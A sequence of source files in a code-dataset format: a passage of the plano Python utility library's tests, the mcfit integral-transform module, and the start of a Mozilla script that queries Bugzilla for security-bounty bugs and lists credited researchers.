== "[2]", result result = http_post(url, read(file_b), output_file="x") output = read("x") assert result is None, result assert output == "[2]", output result = http_post_file(url, file_b) assert result == "[2]", result result = http_post_json(url, parse_json(read(file_b))) assert result == [2], result file_c = write("c", "[3]") result = http_put(url, read(file_c), insecure=True) assert result is None, result result = http_put_file(url, file_c) assert result is None, result result = http_put_json(url, parse_json(read(file_c))) assert result is None, result finally: server.shutdown() server.server_close() server_thread.join() @test def io_operations(): with working_dir(): input_ = "some-text\n" file_a = write("a", input_) output = read(file_a) assert input_ == output, (input_, output) pre_input = "pre-some-text\n" post_input = "post-some-text\n" prepend(file_a, pre_input) append(file_a, post_input) output = tail(file_a, 100) tailed = tail(file_a, 1) assert output.startswith(pre_input), (output, pre_input) assert output.endswith(post_input), (output, post_input) assert tailed == post_input, (tailed, post_input) input_lines = [ "alpha\n", "beta\n", "gamma\n", ] file_b = write_lines("b", input_lines) output_lines = read_lines(file_b) assert input_lines == output_lines, (input_lines, output_lines) pre_lines = ["pre-alpha\n"] post_lines = ["post-gamma\n"] prepend_lines(file_b, pre_lines) append_lines(file_b, post_lines) output_lines = tail_lines(file_b, 100) tailed_lines = tail_lines(file_b, 1) assert output_lines[0] == pre_lines[0], (output_lines[0], pre_lines[0]) assert output_lines[4] == post_lines[0], (output_lines[4], post_lines[0]) assert tailed_lines[0] == post_lines[0], (tailed_lines[0], post_lines[0]) file_c = touch("c") assert is_file(file_c), file_c file_d = write("d", "front@middle@@middle@back") replace_in_file(file_d, "@middle@", "M", count=1) result = read(file_d) assert result == "frontM@middle@back", result @test def iterable_operations(): result = unique([1, 1, 1, 2, 2, 3]) assert result == [1, 2, 3], result result = skip([1, "", 2, None, 3]) assert result == [1, 2, 3], result result = skip([1, "", 2, None, 3], 2) assert result == [1, "", None, 3], result @test def json_operations(): with working_dir(): input_data = { "alpha": [1, 2, 3], } file_a = write_json("a", input_data) output_data = read_json(file_a) assert input_data == output_data, (input_data, output_data) json = read(file_a) parsed_data = parse_json(json) emitted_json = emit_json(input_data) assert input_data == parsed_data, (input_data, parsed_data) assert json == emitted_json, (json, emitted_json) @test def link_operations(): with working_dir(): make_dir("some-dir") path = get_absolute_path(touch("some-dir/some-file")) with working_dir("another-dir"): link = make_link("a-link", path) linked_path = read_link(link) assert linked_path == path, (linked_path, path) @test def logging_operations(): error("Error!") warn("Warning!") notice("Take a look!") notice(123) debug("By the way") debug("abc{0}{1}{2}", 1, 2, 3) with expect_exception(RuntimeError): fail(RuntimeError("Error!")) with expect_error(): fail("Error!") for level in ("debug", "notice", "warn", "error"): with expect_output(contains="Hello") as out: with logging_disabled(): with logging_enabled(level=level, output=out): log(level, "hello") with expect_output(equals="") as out: with logging_enabled(output=out): with logging_disabled(): error("Yikes") @test def path_operations(): with working_dir("/"): curr_dir = get_current_dir() assert curr_dir == "/", curr_dir path = "a/b/c" result = get_absolute_path(path) assert result == join(curr_dir, path), result path = "/x/y/z" result = get_absolute_path(path) assert result == path, result path = "/x/y/z" assert is_absolute(path) path = "x/y/z" assert not is_absolute(path) path = "a//b/../c/" result = normalize_path(path) assert result == "a/c", result path = "/a/../c" result = get_real_path(path) assert result == "/c", result path = "/a/b" result = get_relative_path(path, "/a/c") assert result == "../b", result path = "/a/b" result = get_file_url(path) assert result == "file:/a/b", result with working_dir(): result = get_file_url("afile") assert result == "file:{0}/afile".format(get_current_dir()), result path = "/alpha/beta.ext" path_split = "/alpha", "beta.ext" path_split_extension = "/alpha/beta", ".ext" name_split_extension = "beta", ".ext" result = join(*path_split) assert result == path, result result = split(path) assert result == path_split, result result = split_extension(path) assert result == path_split_extension, result result = get_parent_dir(path) assert result == path_split[0], result result = get_base_name(path) assert result == path_split[1], result result = get_name_stem(path) assert result == name_split_extension[0], result result = get_name_stem("alpha.tar.gz") assert result == "alpha", result result = get_name_extension(path) assert result == name_split_extension[1], result with working_dir(): touch("adir/afile") check_exists("adir") check_exists("adir/afile") check_dir("adir") check_file("adir/afile") with expect_error(): check_exists("adir/notafile") with expect_error(): check_file("adir/notafile") with expect_error(): check_file("adir") with expect_error(): check_dir("not-there") with expect_error(): check_dir("adir/afile") await_exists("adir/afile") with expect_timeout(): await_exists("adir/notafile", timeout=TINY_INTERVAL) @test def port_operations(): result = get_random_port() assert result >= 49152 and result <= 65535, result server_port = get_random_port() server_socket = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM) try: server_socket.bind(("localhost", server_port)) server_socket.listen(5) await_port(server_port) await_port(str(server_port)) check_port(server_port) with expect_error(): get_random_port(min=server_port, max=server_port) finally: server_socket.close() with expect_timeout(): await_port(get_random_port(), timeout=TINY_INTERVAL) @test def process_operations(): result = get_process_id() assert result, result proc = run("date") assert proc is not None, proc print(repr(proc)) run("date", stash=True) proc = run(["echo", "hello"], check=False) assert proc.exit_code == 0, proc.exit_code proc = run("cat /uh/uh", check=False) assert proc.exit_code > 0, proc.exit_code with expect_output() as out: run("date", output=out) run("date", output=DEVNULL) run("date", stdin=DEVNULL) run("date", stdout=DEVNULL) run("date", stderr=DEVNULL) run("echo hello", quiet=True) run("echo hello | cat", shell=True) run(["echo", "hello"], shell=True) with expect_error(): run("/not/there") with expect_error(): run("cat /whoa/not/really", stash=True) result = call("echo hello") assert result == "hello\n", result result = call("echo hello | cat", shell=True) assert result == "hello\n", result with expect_error(): call("cat /whoa/not/really") if PYTHON3: proc = start("sleep 10") with expect_timeout(): wait(proc, timeout=TINY_INTERVAL) proc = start("echo hello") sleep(TINY_INTERVAL) stop(proc) proc = start("sleep 10") stop(proc) proc = start("sleep 10") kill(proc) sleep(TINY_INTERVAL) stop(proc) proc = start("date --not-there") sleep(TINY_INTERVAL) stop(proc) with start("sleep 10"): sleep(TINY_INTERVAL) with working_dir(): touch("i") with start("date", stdin="i", stdout="o", stderr="e"): pass with expect_system_exit(): exit() with expect_system_exit(): exit(verbose=True) with expect_system_exit(): exit("abc") with expect_system_exit(): exit("abc", verbose=True) with expect_system_exit(): exit(Exception()) with expect_system_exit(): exit(Exception(), verbose=True) with expect_system_exit(): exit(123) with expect_system_exit(): exit(123, verbose=True) with expect_system_exit(): exit(-123) with expect_exception(PlanoException): exit(object()) @test def string_operations(): result = replace("ab", "a", "b") assert result == "bb", result result = replace("aba", "a", "b", count=1) assert result == "bba", result result = remove_prefix(None, "xxx") assert result == "", result result = remove_prefix("anterior", "ant") assert result == "erior", result result = remove_prefix("anterior", "ext") assert result == "anterior", result result = remove_suffix(None, "xxx") assert result == "", result result = remove_suffix("exterior", "ior") assert result == "exter", result result = remove_suffix("exterior", "nal") assert result == "exterior" result = shorten("abc", 2) assert result == "ab", result result = shorten("abc", None) assert result == "abc", result result = shorten("abc", 10) assert result == "abc", result result = shorten("ellipsis", 6, ellipsis="...") assert result == "ell...", result result = shorten(None, 6) assert result == "", result result = plural(None) assert result == "", result result = plural("") assert result == "", result result = plural("test") assert result == "tests", result result = plural("test", 1) assert result == "test", result result = plural("bus") assert result == "busses", result result = plural("bus", 1) assert result == "bus", result result = plural("terminus", 2, "termini") assert result == "termini", result result = capitalize(None) assert result == "", result result = capitalize("") assert result == "", result result = capitalize("hello, Frank") assert result == "Hello, Frank", result encoded_result = base64_encode(b"abc") decoded_result = base64_decode(encoded_result) assert decoded_result == b"abc", decoded_result encoded_result = url_encode("abc=123&yeah!") decoded_result = url_decode(encoded_result) assert decoded_result == "abc=123&yeah!", decoded_result @test def temp_operations(): system_temp_dir = get_system_temp_dir() result = make_temp_file() assert result.startswith(system_temp_dir), result result = make_temp_file(suffix=".txt") assert result.endswith(".txt"), result result = make_temp_dir() assert result.startswith(system_temp_dir), result with temp_dir() as d: assert is_dir(d), d list_dir(d) with temp_file() as f: assert is_file(f), f write(f, "test") with working_dir() as d: assert is_dir(d), d list_dir(d) user_temp_dir = get_user_temp_dir() assert user_temp_dir, user_temp_dir ENV.pop("XDG_RUNTIME_DIR", None) user_temp_dir = get_user_temp_dir() assert user_temp_dir, user_temp_dir @test def test_operations(): with test_project(): with working_module_path("python"): import chucker import chucker_tests print_tests(chucker_tests) for verbose in (False, True): run_tests(chucker_tests, verbose=verbose) run_tests(chucker_tests, exclude="*hello*", verbose=verbose) with expect_error(): run_tests(chucker, verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="*badbye*", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="*badbye*", fail_fast=True, verbose=verbose) with expect_exception(KeyboardInterrupt): run_tests(chucker_tests, enable="test_keyboard_interrupt", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="test_timeout", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="test_process_error", verbose=verbose) with expect_error(): run_tests(chucker_tests, enable="test_system_exit", verbose=verbose) with expect_system_exit(): PlanoTestCommand().main(["--module", "nosuchmodule"]) def run_command(*args): PlanoTestCommand(chucker_tests).main(args) run_command("--verbose") run_command("--list") with expect_system_exit(): run_command("--enable", "*badbye*") with expect_system_exit(): run_command("--enable", "*badbye*", "--verbose") try: with expect_exception(): pass raise Exception() # pragma: nocover except AssertionError: pass with expect_output(equals="abc123", contains="bc12", startswith="abc", endswith="123") as out: write(out, "abc123") @test def time_operations(): start_time = get_time() sleep(TINY_INTERVAL) assert get_time() - start_time > TINY_INTERVAL with expect_system_exit(): with start("sleep 10"): from plano import _default_sigterm_handler _default_sigterm_handler(_signal.SIGTERM, None) result = format_duration(0.1) assert result == "0.1s", result result = format_duration(1) assert result == "1s", result result = format_duration(1, align=True) assert result == "1.0s", result result = format_duration(60) assert result == "60s", result result = format_duration(3600) assert result == "1h", result with Timer() as timer: sleep(TINY_INTERVAL) assert timer.elapsed_time > TINY_INTERVAL assert timer.elapsed_time > TINY_INTERVAL with expect_timeout(): with Timer(timeout=TINY_INTERVAL) as timer: sleep(10) @test def unique_id_operations(): id1 = get_unique_id() id2 = get_unique_id() assert id1 != id2, (id1, id2) result = get_unique_id(1) assert len(result) == 2 result = get_unique_id(16) assert len(result) == 32 @test def value_operations(): result = nvl(None, "a") assert result == "a", result result = nvl("b", "a") assert result == "b", result assert is_string("a") assert not is_string(1) for value in (None, "", (), [], {}): assert is_empty(value), value for value in (object(), " ", (1,), [1], {"a": 1}): assert not is_empty(value), value result = pformat({"z": 1, "a": 2}) assert result == "{'a': 2, 'z': 1}", result result = format_empty((), "[nothing]") assert result == "[nothing]", result result = format_empty((1,), "[nothing]") assert result == (1,), result result = format_not_empty("abc", "[{0}]") assert result == "[abc]", result result = format_not_empty({}, "[{0}]") assert result == {}, result result = format_repr(Namespace(a=1, b=2), limit=1) assert result == "Namespace(a=1)", result result = Namespace(a=1, b=2) assert result.a == 1, result assert result.b == 2, result assert "a" in result, result assert "c" not in result, result repr(result) other = Namespace(a=1, b=2, c=3) assert result != other, (result, other) @test def yaml_operations(): try: import yaml as _yaml except ImportError: raise PlanoTestSkipped("PyYAML is not available") with working_dir(): input_data = { "alpha": [1, 2, 3], } file_a = write_yaml("a", input_data) output_data = read_yaml(file_a) assert input_data == output_data, (input_data, output_data) yaml = read(file_a) parsed_data = parse_yaml(yaml) emitted_yaml = emit_yaml(input_data) assert input_data == parsed_data, (input_data, parsed_data) assert yaml == emitted_yaml, (yaml, emitted_yaml) @test def plano_command(): if PYTHON2: # pragma: nocover raise PlanoTestSkipped("The plano command is not supported on Python 2") with working_dir(): PlanoCommand().main([]) with working_dir(): write("Planofile", "garbage") with expect_system_exit(): PlanoCommand().main([]) with expect_system_exit(): PlanoCommand("no-such-file").main([]) with expect_system_exit(): PlanoCommand().main(["-f", "no-such-file"]) def run_command(*args): PlanoCommand().main(["-f", test_project_dir] + list(args)) with test_project(): run_command() run_command("--help") run_command("--quiet") run_command("--init-only") run_command("build") run_command("install") run_command("clean") with expect_system_exit(): run_command("build", "--help") with expect_system_exit(): run_command("no-such-command") with expect_system_exit(): run_command("no-such-command", "--help") with expect_system_exit(): run_command("--help", "no-such-command") run_command("extended-command", "a", "b", "--omega", "z") with expect_system_exit(): run_command("echo") with expect_exception(contains="Trouble"): run_command("echo", "Hello", "--trouble") run_command("echo", "Hello", "--count", "5") with expect_system_exit(): run_command("echo", "Hello", "--count", "not-an-int") run_command("haberdash", "ballcap", "fedora", "hardhat", "--last", "turban") result = read_json("haberdash.json") assert result == ["ballcap", "fedora", "hardhat", "turban"], result run_command("haberdash", "ballcap", "--last", "turban") result = read_json("haberdash.json") assert result == ["ballcap", "turban"], result run_command("haberdash", "ballcap") result = read_json("haberdash.json") assert result == ["ballcap", "bowler"], result run_command("balderdash", "bunk", "poppycock") result = read_json("balderdash.json") assert result == ["bunk", "poppycock", "rubbish"], result run_command("balderdash", "bunk") result = read_json("balderdash.json") assert result == ["bunk", "malarkey", "rubbish"], result run_command("balderdash", "bunk", "--other", "bollocks") result = read_json("balderdash.json") assert result == ["bunk", "malarkey", "bollocks"], result @test def plano_shell_command(): python_dir = get_absolute_path("python") with working_dir(): write("script1", "garbage") with expect_exception(NameError): PlanoShellCommand().main(["script1"]) write("script2", "print_env()") PlanoShellCommand().main(["script2"]) PlanoShellCommand().main(["--command", "print_env()"]) write("command", "from plano import *; PlanoShellCommand().main()") with working_env(PYTHONPATH=python_dir): run("{0} command".format(_sys.executable), input="cprint('Hi!', color='green'); exit()") run("echo \"cprint('Bi!', color='red')\" | {0} command -".format(_sys.executable), shell=True) with expect_system_exit(): PlanoShellCommand().main(["no-such-file"])
ssorj/qtools
subrepos/plano/python/plano_tests.py
Python
apache-2.0
31,950
[ "Amber" ]
1e7afbb5e8d69b83e96402b83fd2322988c63de0e6a2bcd18e1986ec4c774c60
""" =========================================== Common Integral transforms and applications =========================================== """ from __future__ import division from .mcfit import mcfit from . import kernels import numpy from scipy.special import gamma __all__ = ['Hankel', 'SphericalBessel', 'FourierSine', 'FourierCosine', 'TophatSmooth', 'GaussSmooth'] class Hankel(mcfit): """Hankel transform pair """ def __init__(self, x, nu=0, q=1, N=None, lowring=True): self.nu = nu UK = kernels.Mellin_BesselJ(nu) mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**2 class SphericalBessel(mcfit): """Spherical Bessel transform pair """ def __init__(self, x, nu=0, q=1.5, N=None, lowring=True): self.nu = nu UK = kernels.Mellin_SphericalBesselJ(nu) mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**3 class FourierSine(mcfit): """Fourier sine transform pair """ def __init__(self, x, q=0.5, N=None, lowring=True): UK = kernels.Mellin_FourierSine() mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x class FourierCosine(mcfit): """Fourier cosine transform pair """ def __init__(self, x, q=0.5, N=None, lowring=True): UK = kernels.Mellin_FourierCosine() mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x class TophatSmooth(mcfit): """Top-hat smoothing of a radial function """ def __init__(self, x, d=3, q=0, N=None, lowring=True): self.d = d UK = kernels.Mellin_Tophat(d) mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**d / (2**(d-1) * numpy.pi**(d/2) * gamma(d/2)) class GaussSmooth(mcfit): """Gaussian smoothing of a radial function """ def __init__(self, x, d=3, q=0, N=None, lowring=True): self.d = d UK = kernels.Mellin_Gauss() mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**d / (2**(d-1) * numpy.pi**(d/2) * gamma(d/2))
nickhand/pyRSD
pyRSD/extern/mcfit/transforms.py
Python
gpl-3.0
2,159
[ "Gaussian" ]
e799d7c242bf1a8550dafcb34d469d5ca81fc4d4cb6e58b89effad6c300de427
#!/usr/bin/env python3 # -*- coding: utf8 -*- import requests import argparse import pprint import json import sys import re import hmac import time from datetime import datetime import os import base64 from requests.adapters import HTTPAdapter from requests.packages.urllib3.util.retry import Retry HEADERS = { 'Accept': 'application/json' } BASE_URL = 'https://bugzilla.mozilla.org/rest/' HMAC_KEY_ATTACHMENT_ID = 9133354 # Bug 1622495 search_url = BASE_URL + 'bug' + \ """ ?x=x &limit=0 &f1=classification &o1=notequals &v1=Graveyard &f2=OP &j2=OR &j3=OR &f3=OP &f4=flagtypes.name &o4=substring &v4=sec-bounty-hof%2B &f5=flagtypes.name &o5=substring &v5=sec-bounty%2B &f6=CP &f7=OP &f8=alias &o8=substring &v8=CVE- &f9=flagtypes.name &o9=substring &v9=sec-bounty- &f10=CP &f11=CP &classification=Client%20Software &classification=Developer%20Infrastructure &classification=Components &classification=Server%20Software &classification=Other """.replace("\n", "") CVE_REVIEW = """ https://bugzilla.mozilla.org/buglist.cgi?x=x &classification=Client%20Software &classification=Developer%20Infrastructure &classification=Components &classification=Server%20Software &classification=Other &f1=flagtypes.name &o1=substring &v1=sec-bounty- &f2=alias &o2=substring &v2=CVE-YEAR_REPLACEME &f3=flagtypes.name &o3=notsubstring &v3=sec-bounty-hof%2B &o4=notsubstring &f4=flagtypes.name &v4=sec-bounty-hof- """.replace("\n", "") credit_entries = { "fdfe2689e2668dcfe620ac81a741fde8":"Harsh Banshpal", "e6f0d7b286f04f05d4ac4ae498bf2a32":"Yaroslav Babin", "0c239777752cc449e91df93984e4c0c8":"Irwan", "4cc72613ad5eb1dc54b6acf0be217aed":"Mattias Jacobsson", "f72d4bcd18f0526f8faa4f781513c91f":"Hafiizh", "9513cb577e79e3f73e3af0886ba27e70":"Hou JingYi", "3ce577ba2fed1b2decbeb3eb4e466f8d":"Alesandro Ortiz", "e4c8c633605b27018520a5a35934c884":"Abiral Shrestha", "8aeb1a975c9c817eb6638851058fa5f2":"redparsec", "c37b0aecd957572ef3e680cd7494b864":"Felipe Caon", "305a3f15dfabae7353bf675ca5b7a23d":"Yangkang of 360 ATA Team", "15c2f9fe6f16230593ed3c11324c155e":"Maor Kleinberger", "a480398726999a758b808aed02ef5e5e":"Bui Dai Gia of VNG Corporation", "028ff665214190ae419f0febbdff465f" : "James Grant", "047a2ade7fdc3c6d84d5dbea228fe71e" : "Julien Maladrie", "05c9059021985684d94c2631e62b9d12" : "Zhang Hanming from 360 Vulcan team", "0a446dcb43d3f9f5da29afb14a40e58f" : "Taegeon Lee", "0add10eeb3f4f6b4ce9aee50e6e8e08d" : "Aaron Costello", "0c7f4b38ad0b504cfc48042e14564cc8" : "Paul Stone", "0cdb9b89f615c444f832e56c844e9e75" : "Allyson O'Malley", "0eaafbf6f9aabe86a4b040ca50d9191a" : "Shinto K Anto", "0f05e10145035903cbb34aac06f3edf6" : "Anonymous", "0f14322cc49704ac5551ffe5835abd69" : "Sree Visakh Jain (@sreevisakhjain)", "0fc499252d7f74175967ba225e186ed9" : "André Bargull", "0fed7c4928e7623eeabf7c040b6bc4a5" : "musicDespiteEverything", "11adc383a41d3f1fead9661104782014" : "Ronen Zilberman", "1248a90a05c7e3a46b97e6aceeb557ce" : "SkyLined", "13215febfe461aae88eda362e7c96cee" : "Eili Masami of Tachibana Lab", "14f41cb4275ed7f671a593138b886e84" : "Yasin Soliman", "158f1b632674edbf228a5d98269822af" : "Christian Holler", "15acbd736229d79a8ed92e690164559c" : "Nils André-Chang", "164a35fccb05c6bb8a26d881da42bda7" : "Muneaki Nishimura (a.k.a. nishimunea)", "18844199a107c0665b6de05b47ce0340" : "Colin D. Munro", "192aac4383d85b9acf43554612c6b461" : "Vitaly Nevgen", "192e0a963474e27f64bf46f0ddde8268" : "Seb Patane", "1a20e0311c4352bb986d6e876d4b6e89" : "Fourteenforty Research Institute Japan", "1a99b22b84db560244569dcbe868dcd0" : "Andrew Krasichkov", "1ababea19b88a30da141dca3bdf006d4" : "sushi Anton Larsson", "1ad1f39c1e7968ff5cfe318281e0455f" : "Tyson Smith", "1b46bfa367b8cddece232ebfddaccc9d" : "Fabián Cuchietti", "1c04ef59bd60189ce09cfca187225e75" : "Mohammed Fayez Ahmed Albanna", "1cc583009e744f3a2e63c6ca0ca72c10" : "Dhiraj Mishra", "1ced3fc2a9846c0b8a9e99db5416fc29" : "Holger Fuhrmannek", "1d239c1ff42a3e8e1c16c976020fd45f" : "Philipp Kewisch", "1d2c94a3301ca111ff6bb161b3069a9c" : "Anonymous", "1d6eb1c6e8a177847eca74cad00fc301" : "José María Acuña Morgado", "1e304bfde59dcfb0131e21e913281614" : "Luigi Gubello", "1e7c9dd1924cf9763c2507c94be341c2" : "Linus Särud", "1ffe73fabf298c651b7a8c750de530d2" : "Siraje Amarniss of Fukusa", "21c712eaa986e0ae3e135fe689259684" : "Matthew Somerville", "2841918025ae79884c3eac763a453b76" : "Jens Gorontzi", "2920656b8c8d785f7ccecab735a106a8" : "SkyLined", "2bb8b9860ce62f3fbc9e7eec1a9d5ed0" : "Giorgio Maone of NoScript", "2cbc00679c4b47da86d775e2c98d4bd6" : "Zhou Yuyang", "302a4e6aa69950cd60e295d433440bd3" : "Gustavo Grieco", "311d66bfb9fbda45dc6920920a9efb5e" : "Andrea.", "315a4e71ad122182426d8da0d5d1e8fb" : "Michael Smith", "31b9334ff2ac135414563035a5c11823" : "Context Information Security", "337554f7f0ac9ded2ef6110a7a12910b" : "David Dworken", "342df00dfa13da31ecc6efe69d5f6da6" : "moz_bug_r_a4", "3597ac4747474360b391a5e359948ca9" : "Mario Gomes", "359ee9ee2e4c35e5fa8097e48bd22c50" : "Vladimir Metnew", "373ff2b767419c0619f3991348f8d930" : "David Chan", "37a2557cee7c4198951b1af8b1243a2e" : "Georg Koppen of The Tor Project", "38161e481b381a72de3c4804a292d4ab" : "Atte Kettunen", "39897587a528519753812e6f6256f6bd" : "firehack", "399471310b07538c814c230e9029b0bb" : "Wladimir Palant", "3a98d1971bc7fab8d457063492a5a467" : "Rafay Baloch of Pakistan Telecommunications Authority ", "3c098d6ead472177028bde34acacb5f1" : "Takeshi Terada of Mitsui Bussan Secure Directions Inc.", "3c9e02bf1983fa620099841bb91ea3e0" : "Sergey Bobrov", "3f3a7252004367671037582e9dde174d" : "Luca Moretto", "3f3fae9ad20da4c5655ceda765563e6c" : "Benjamin Kunz Mejri", "43b406ebd2c3d45534aec1e4843ba504" : "Bharadwaj Machiraju", "45e5fe739d4a915a757b37940170e852" : "Harry Gertos", "4649493b3babcd55144931b73a973bce" : "Yaniv Frank with SophosLabs", "46b96542a8687c90e46400e780b6b4ac" : "Anonymous", "47403ba3cf9bcae0874a07f299f643f0" : "Chris Rohlf", "480d732942ba3ecdedf961ce3fa9fc64" : "Ademar Nowasky Junior", "49c31aaa040fce3a5fcaf771ad56b382" : "AaylaSecura1138", "4a5880b0447f7349c9cbcff76045b3e6" : "Rayyan Bijoora", "4a66274c7f1063c7ef3b3c3d9f747566" : "Craig Disselkoen", "4b52df50eaaf097f6f062bfea6cf0abe" : "Artur Osiński (Virtual_ManPL)", "4b7fd0d6665950db856bc5e22846f719" : "Tobias Klein", "4bf2165b96b2506a0ac2212b39fb78b1" : "Clémentine Maurice", "4cb38b42bb161ce775b5e7f91d260d3f" : "Daniel Maksimovic", "4ea165c7445cfa9a7ed0685e64cdf1fb" : "Paul Stone of Context Information Security", "5080064df3a2c21441c9fb6cc3b5f816" : "Jerry Decime", "50ab8d7a3724d141c8f5cd8797d66977" : "Xiaoyin Liu", "55f0363f4c86284fe5689525c5640c32" : "Riccardo Ancarani", "59260d270baa2ce555fcf323c46d0c03" : "Codermak", "5fbaf4a6794928a04644d7a0a73f7141" : "Alexander Klink", "647f1e3053ac60b34405e11876ec02e4" : "Juho Nurminen of Mattermost", "64e04ce43d3007a00b51c63553c48efb" : "p4fg", "654445704639346f526d1ef514d08fd7" : "ACROS Security", "668988e8a957c941b5b3619cfdc005d1" : "XiaoXiong(superxx) of Qihoo 360 CERT", "66c52290aeab671fa01c2e062f6c2e01" : "Karl Aparece", "690334c0cae6df099269d105526a42f3" : "Jordi Chancel", "6b04af2a3e852190d05cc5a05b438d2e" : "Ulrich Günther", "6c5314d59c2e56564b18fe6199305fd3" : "Abdellah Nadi", "704b002c6bd62215d3738f6fe9c6524a" : "Gregory Smiley of Security Compass", "70cc13ce2ba436916140efa887a10fca" : "Falko Strenzke of cryptosource GmbH", "71106bd16473852ff8d395e9eb2be45c" : "mlfbrown", "719febfa274b646e3b33d2b9f95885c4" : "obmi", "723fd46df5eb10ad0fa79da65d7cc961" : "Samuel Erb", "740b81a60bd25700b839f63e8d937796" : "Karthik Kumar reddy", "7495547634e174c0e2f49e939d6fe3ee" : "Scott Bell", "75488be765fd509d904767102b6bb6b7" : "Mario Heiderich", "755ae0590425c02b3c203036df1a7e1e" : "Tim Hemel", "75b14a4315405e7480d0620b8eb3c11c" : "Flo van der vlist", "7645f2eb64dccd9602b24b6ce9fce138" : "Chun Han Hsiao", "76d59fb088161da3466512c6d304ca2f" : "Jordi Chancel", "77af16493363287bc9b6ed99548293d7" : "Aryan Sinha", "77b1dc2043055d86d9e81b5035efe29f" : "Irvan Kurniawan (sourc7)", "78eeb94fe5fe67f95d9cd574d9ec69db" : "Inko", "7a3d52ef9f515ad5d4aad5868c2e65aa" : "Chamal De Silva", "7aba285c7e4b7f41df3dae6f4becd2a9" : "Sebas (@0xroot)", "7b33d07bc038c1ec083e51e31e139fdb" : "Joshua Graham of TSS", "7bd9d5640cb0f0dd5e59ccd7b02a0349" : "Abraruddin Khan and Omair", "7bed3bd152a0fd4badc6d2ddd4e86e1b" : "Rafael Gieschke", "7dc3304d4c7f8d13fa0f248f54b07a20" : "Kaspar Brand", "7e1e41ab0cd46a4a32c82def7b840a6d" : "Mario Heiderich of Cure53", "7ec079736a63d226ce3b436b5f49b1d9" : "Daniel Santos", "7edb6115b239d771b9689857b9e95568" : "Hanno Böck", "7fa6444936bd7ae17ecad924fca93c6d" : "Luis Merino - Brandon Perry", "80e0b8cb2a22f8b9669d2ca1968ce898" : "Eduard Wirch", "81236113f95cd9d1591343e78fe204c5" : "Dongsung Kim", "815f2b92b84655f6a7e9e53ad10e78f4" : "Mitchell Harper", "817bd7bdff0d93ccdada8707b5278a08" : "Alexander Nagy", "82d7844614f152d6865e83d43f040a8b" : "Antonio Sanso", "8314603008777278fd70c0b9b4f01645" : "Adam Barth", "8363fd9f9f37fbaf5d600e676bf3aec5" : "Muhammad R. Maulana", "853c74a41a0a08216a565eb558b2c4c4" : "bo13oy of Qihoo 360 Vulcan Team", "87b3f4e2ea33d7e5aea49e26dab8ab5b" : "Jethro Beekman - Security Researcher at University of California - Berkeley", "87c66fa50295d7055022c4625c76b208" : "Rain", "887ba2d86d5c5c29814a38c371854928" : "Soroush Dalili", "89a138d6477c6a80b7f6c2e59a6c2fa4" : "Anurag Jain", "89ae6542ce619780d318477fe724bb57" : "gfleischer", "8de462f5f2d47748bcd761a45f2f157c" : "Nicolas Golubovic", "8f3b70144b559447d576b239d48e3b77" : "Max May", "8ff363f2185736b3ad47f35f8140c82a" : "Mei Wang of GearTeam Qihoo 360.", "9219e61c33ff1e2d14b670b865caffa8" : "Nikhil Mittal", "9228cdb27944fb384f1305d2d0c350b8" : "Tushar Rawool", "92979b13d84087187a7d5630e1c76b87" : "Luke Li", "937c35a7adce7a73254cf0c2ed905e9c" : "Raphael Shaniyazov", "95663a4cc4fa467fdd949b16b6e03760" : "knud", "9667bad21b75845c367e1c91ea59d788" : "jensvoid", "9684d8c1d955335cb2ba23ddab9769ac" : "Rotem Kerner", "96b79d035cfa51215a941052528e9182" : "Michał Bentkowski", "977f16d94af9ed0b87f3d10b766f4f07" : "Jesse Luoto", "9832ee85d3227243306872874b7157ea" : "Jianjun Chen", "9a7ef4ebc1fe8c5e7f59016564db97b4" : "Yossi Oren", "9a9379446b32063fe371d116fb21deef" : "Leo Starcevic", "9b50ae1f239de9709af5f1db53629f8c" : "Ravi Kishor", "9d3bc5f160291389423da6ff52f5bc44" : "Luật Nguyễn", "9d69c86b66ca54565cd98aec6b6baaa3" : "Ahmed Elsobky", "9d729c1661a6d2474eb380131765eb6a" : "Abhishek Arya", "9d81009615f1e3b3b269eb78a4abd529" : "David Huang", "9d94a16c3719a01989b3eea98217cbfa" : "Dave Yesland", "9de234ea6d5568ef604dd3431af941e4" : "James Lee", "9e6d48cc96c5931585cbe2bfc66246b8" : "Aki Helin", "a01c8445e5c582a2465b1ff75ab6b4d9" : "Pedro Oliveira", "a63f14172a1a1763ebe352317a9c9156" : "Nassim Bouali", "a71a35e2a42f69964a986531483ab405" : "Jack Wrenn", "a72696a2089d2ea69143161018fa7c23" : "Zhong Zhaochen", "a8b84761cdafee6392f64aa115edc48b" : "Andrei Cristian Petcu", "a9173d90c2151988a643fee35abafb9f" : "Juho Nurminen", "a9e1d36bf363994f9a39353d1e384eab" : "guyio", "ab37a4ca424a143670adc9093c7086b9" : "Scott Bell", "ab52f2c4485ec82dcd6b5c36b845e6d5" : "James Kitchener", "ab54897026ce6f76bb9cbaf9a86a1fc8" : "Brian 'geeknik' Carpenter", "abb98d52131c2c03f832122ea7f9308b" : "Ismail Tasdelen", "ac6cb3312f13091a2b1ab69bb496057d" : "Rob Wu", "ad4e3024178ee23278381ebfbc54528f" : "Looben Yang", "adbee288a6f9cf15602fda47356d5175" : "Hany Ragab; Enrico Barberis; Herbert Bos; Cristiano Giuffrida", "af5f683612b2560ceeb75586a09f8525" : "Arvind", "b1448aa9184c61d226eb2d9901d6ae35" : "Krzysztof `vnd’ Katowicz-Kowalewski", "b16601816f98299912f0ea692e738c05" : "Anonymous", "b18940ae4a081c594022bcd56e7d949a" : "Ronald Crane", "b1a7c3c63dd184cfac07998a22977ccc" : "Harshit Mahendra", "b1a7d637734d5dad9b43136609c8f31f" : "Ronald Crane", "b1bce803655916f8687d2da2787a17c6" : "Clément Lavoillotte", "b309975ebb9ea77a8021712f1fc0d908" : "Ezra Caltum", "b39f833e348ce97f571df4efc94ee88d" : "Kaizer Soze", "b55ff048a2450ef3b41abb9208d836d6" : "Diego Calleja", 